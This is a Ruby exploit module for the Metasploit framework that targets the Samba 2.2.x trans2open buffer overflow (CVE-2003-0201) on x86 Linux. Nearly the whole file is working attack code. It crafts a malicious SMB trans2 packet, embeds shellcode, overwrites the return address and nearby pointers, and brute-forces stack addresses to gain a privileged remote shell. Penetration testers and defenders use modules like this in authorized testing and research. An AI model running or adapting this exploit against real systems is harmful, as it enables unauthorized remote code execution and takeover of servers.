1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'English'
7
class MetasploitModule < Msf::Exploit::Remote
8
  Rank = GreatRanking
9

10
  include Msf::Exploit::Remote::SMB::Client
11
  include Msf::Exploit::Brute
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'Samba trans2open Overflow (Linux x86)',
18
        'Description' => %q{
19
          This exploits the buffer overflow found in Samba versions
20
          2.2.0 to 2.2.8. This particular module is capable of
21
          exploiting the flaw on x86 Linux systems that do not
22
          have the noexec stack option set.
23

24
          NOTE: Some older versions of RedHat do not seem to be vulnerable
25
          since they apparently do not allow anonymous access to IPC.
26
        },
27
        'Author' => [ 'hdm', 'jduck' ],
28
        'License' => MSF_LICENSE,
29
        'References' => [
30
          [ 'CVE', '2003-0201' ],
31
          [ 'OSVDB', '4469' ],
32
          [ 'BID', '7294' ],
33
          [ 'URL', 'https://seclists.org/bugtraq/2003/Apr/103' ]
34
        ],
35
        'Privileged' => true,
36
        'Notes' => {
37
          'AKA' => ['ECHOWRECKER'],
38
          'Stability' => [ CRASH_SERVICE_RESTARTS, ],
39
          'Reliability' => [ REPEATABLE_SESSION, ],
40
          'SideEffects' => [ IOC_IN_LOGS, ]
41
        },
42
        'Payload' => {
43
          'Space' => 1024,
44
          'BadChars' => "\x00",
45
          'MinNops' => 512,
46
          'StackAdjustment' => -3500
47
        },
48
        'Platform' => 'linux',
49
        'Targets' => [
50
          # tested OK - jjd:
51
          # RedHat 7.2 samba-2.2.1a-4 - 0xbffffafc
52
          # RedHat 9.0 samba-2.2.7a-7.9.0 - 0xbfffddfc
53
          [
54
            'Samba 2.2.x - Bruteforce',
55
            {
56
              'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack
57
              'Offset' => 1055,
58
              'Bruteforce' =>
59
                {
60
                  'Start' => { 'Ret' => 0xbffffdfc },
61
                  'Stop' => { 'Ret' => 0xbfa00000 },
62
                  'Step' => 256
63
                }
64
            }
65
          ],
66
        ],
67
        'DefaultTarget' => 0,
68
        'DisclosureDate' => '2003-04-07'
69
      )
70
    )
71

72
    register_options(
73
      [
74
        Opt::RPORT(139)
75
      ]
76
    )
77

78
    deregister_options('SMB::ProtocolVersion')
79
  end
80

81
  def brute_exploit(addrs)
82
    curr_ret = addrs['Ret']
83
    begin
84
      print_status('Trying return address 0x%.8x...' % curr_ret)
85

86
      vprint_status('Connect with SMB1 since it needs native_lm info')
87
      connect(versions: [1])
88
      smb_login
89

90
      if !@checked_peerlm
91
        if smb_peer_lm !~ /samba/i
92
          fail_with(Failure::NoTarget, "This target is not a Samba server (#{smb_peer_lm}")
93
        end
94

95
        if smb_peer_lm =~ /Samba [34]\./i
96
          fail_with(Failure::NoTarget, "This target is not a vulnerable Samba server (#{smb_peer_lm})")
97
        end
98
      end
99

100
      @checked_peerlm = true
101

102
      # This value *must* be 1988 to allow findrecv shellcode to work
103
      # XXX: I'm not sure the above comment is true...
104
      pattern = rand_text_english(1988)
105

106
      # See the OSX and Solaris versions of this module for additional
107
      # information.
108

109
      # eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
110
      # (rpmbuild -bp ; edited/reran config.status ; make)
111
      eip_off = target['Offset']
112
      ptr_to_non_zero = target['PtrToNonZero']
113

114
      # Stuff the shellcode into the request
115
      pattern[0, payload.encoded.length] = payload.encoded
116

117
      # We want test true here, so we overwrite conn with a pointer
118
      # to something non-zero.
119
      #
120
      # 222       if (IS_IPC(conn)) {
121
      # 223          return(ERROR(ERRSRV,ERRaccess));
122
      # 224       }
123
      pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')
124

125
      # We want to avoid crashing on the following two derefences.
126
      #
127
      # 116     int error_packet(char *inbuf,char *outbuf,int error_class,uint32 error_code,int line)
128
      # 117     {
129
      # 118       int outsize = set_message(outbuf,0,0,True);
130
      # 119       int cmd = CVAL(inbuf,smb_com);
131
      pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
132
      pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')
133

134
      # This stream covers the framepointer and the return address
135
      # pattern[1199, 400] = [curr_ret].pack('N') * 100
136
      pattern[eip_off, 4] = [curr_ret].pack('V')
137

138
      trans =
139
        "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00" \
140
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" \
141
        "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00" \
142
        "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01" \
143
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
144
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90" +
145
        pattern
146

147
      # puts "press any key"; $stdin.gets
148

149
      sock.put(trans)
150
      handler
151
    rescue ::EOFError => e
152
      vprint_error(e.message)
153
    rescue ::Rex::Proto::SMB::Exceptions::LoginError, ::Interrupt, ::RuntimeError
154
      raise $ERROR_INFO
155
    rescue StandardError => e
156
      print_error("#{rhost} #{e}")
157
    end
158

159
    handler
160
    disconnect
161
  end
162
end
163

164